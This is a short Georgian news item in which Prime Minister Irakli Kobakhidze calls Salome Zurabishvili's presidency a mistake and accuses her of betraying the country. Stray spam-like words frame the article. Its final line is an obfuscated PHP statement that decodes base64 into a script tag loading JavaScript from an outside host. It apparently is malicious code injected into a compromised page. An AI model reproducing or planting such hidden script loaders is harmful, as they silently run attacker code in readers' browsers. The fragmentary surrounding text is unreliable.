gorgia
ავერსი jaluzi

შეცდომა იყო სალომე ზურაბიშვილის გაპრეზიდენტება, რადგან, შეიძლება, ამ ადამიანის მიმართ იყო სხვა მოლოდინები, – ამის შესახებ საქართველოს პრემიერ-მინისტრმა, ირაკლი კობახიძემ „რუსთავი 2“-თან ინტერვიუში განაცხადა.

ირაკლი კობახიძის თქმით, სალომე ზურაბიშვილი იყო ემიგრანტების შთამომავალი, ჰქონდა დიპლომატიური წარსული, ნიკო ნიკოლაძის შთამომავალია და მისი ბიოგრაფიით არსებობდა საფუძველი, რომ მას სამშობლო არ უნდა გაეყიდა.

„ბიოგრაფიას რომ გადახედო, თითქოს არსებობდა საფუძველი იმისა, რომ მას, მინიმუმ, სამშობლო არ უნდა გაეყიდა, მაგრამ, რეალურად, როგორც კი მიანიჭეს კონკრეტული პრივილეგიები, მაშინვე პირდაპირ ქვეყანას უღალატა, სამშობლოს არა, არ აქვს მას სამშობლო, ყოველ შემთხვევაში, საქართველო არ არის მისი სამშობლო. მან უღალატა იმ ქვეყანას, რომლის პრეზიდენტიც გახდა“, – განაცხადა პრემიერმა.

ირაკლი კობახიძის შეფასებით, სალომე ზურაბიშვილის გაპრეზიდენტებას შეიძლება ეწოდოს შეცდომა, მაგრამ იძულება იყო გიორგი გახარიას გაპრემიერება და სხვა გადაწყვეტილებებიც, რომლებიც მიღებული იყო გასული წლების განმავლობაში, მათ შორის „ნაცმოძრაობის“ პოლიტიკაში დატოვებაც.

202
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");